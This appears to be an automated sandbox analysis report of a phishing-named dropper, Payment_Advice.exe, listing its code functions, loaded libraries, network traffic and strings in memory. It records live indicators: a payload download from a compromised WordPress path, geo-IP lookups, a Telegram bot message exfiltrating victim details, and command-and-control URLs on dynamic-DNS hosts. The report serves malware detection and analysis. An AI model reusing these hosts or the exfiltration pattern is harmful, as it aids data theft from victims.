Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 028BF2EDh | 5_2_028BF12B |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 028BFAA9h | 5_2_028BF804 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 028BF2EDh | 5_2_028BF33C |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 24492C21h | 5_2_24492970 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 244931E8h | 5_2_24492DD0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 5_2_24490040 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449E311h | 5_2_2449E068 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449DEB9h | 5_2_2449DC10 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449E769h | 5_2_2449E4C0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449F019h | 5_2_2449ED70 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449EBC1h | 5_2_2449E918 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 244931E8h | 5_2_24493116 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449F471h | 5_2_2449F1C8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 244931E8h | 5_2_24492DC7 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449FD21h | 5_2_2449FA78 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449F8C9h | 5_2_2449F620 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449D609h | 5_2_2449D360 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449D1B1h | 5_2_2449CF08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 24490D0Dh | 5_2_24490B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 24491697h | 5_2_24490B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4x nop then jmp 2449DA61h | 5_2_2449D7B8 |
Source: global traffic | HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/ |
Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://electromac.com.bo |
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.electromac.com.bo |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.i.lencr.org/01 |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.o.lencr.org0# |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://s.symcd.com06 |
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0( |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0; |
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081 |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0 |
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0 |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/cps0% |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0 |
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr | String found in binary or memory: https://d.symcb.com/rpa0. |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org |
Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/ |
Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB |
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/ |
Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin |
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_00404B0E | 0_2_00404B0E |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0040653D | 0_2_0040653D |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04E5EAD8 | 2_2_04E5EAD8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04E5F3A8 | 2_2_04E5F3A8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04E5E790 | 2_2_04E5E790 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0799C4D6 | 2_2_0799C4D6 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028B5362 | 5_2_028B5362 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BA088 | 5_2_028BA088 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BC146 | 5_2_028BC146 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BC738 | 5_2_028BC738 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BC468 | 5_2_028BC468 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BD599 | 5_2_028BD599 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BCA08 | 5_2_028BCA08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BF804 | 5_2_028BF804 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BCFAB | 5_2_028BCFAB |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028B6FC8 | 5_2_028B6FC8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BCCD8 | 5_2_028BCCD8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BEC18 | 5_2_028BEC18 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028B39EE | 5_2_028B39EE |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028B29EC | 5_2_028B29EC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028B3E09 | 5_2_028B3E09 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BEC0B | 5_2_028BEC0B |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_028BFC50 | 5_2_028BFC50 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_05BD2660 | 5_2_05BD2660 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_05BD55E0 | 5_2_05BD55E0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_05BDBF40 | 5_2_05BDBF40 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_05BD39BC | 5_2_05BD39BC |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24492970 | 5_2_24492970 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24492288 | 5_2_24492288 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24495290 | 5_2_24495290 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24491BA8 | 5_2_24491BA8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_244997B0 | 5_2_244997B0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24490040 | 5_2_24490040 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449E068 | 5_2_2449E068 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449E067 | 5_2_2449E067 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449DC01 | 5_2_2449DC01 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449DC10 | 5_2_2449DC10 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449003F | 5_2_2449003F |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449E4C0 | 5_2_2449E4C0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449E4BF | 5_2_2449E4BF |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24492963 | 5_2_24492963 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449ED70 | 5_2_2449ED70 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449E918 | 5_2_2449E918 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449E917 | 5_2_2449E917 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449F1C8 | 5_2_2449F1C8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24498DF9 | 5_2_24498DF9 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24499590 | 5_2_24499590 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449F1B9 | 5_2_2449F1B9 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24499E46 | 5_2_24499E46 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449FA78 | 5_2_2449FA78 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24492278 | 5_2_24492278 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24498E08 | 5_2_24498E08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449F620 | 5_2_2449F620 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24499ED8 | 5_2_24499ED8 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24495283 | 5_2_24495283 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449D360 | 5_2_2449D360 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449CF08 | 5_2_2449CF08 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24490B28 | 5_2_24490B28 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24490B30 | 5_2_24490B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_24491B97 | 5_2_24491B97 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_2449D7B8 | 5_2_2449D7B8 |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: shfolder.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: riched20.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: usp10.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: msls31.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
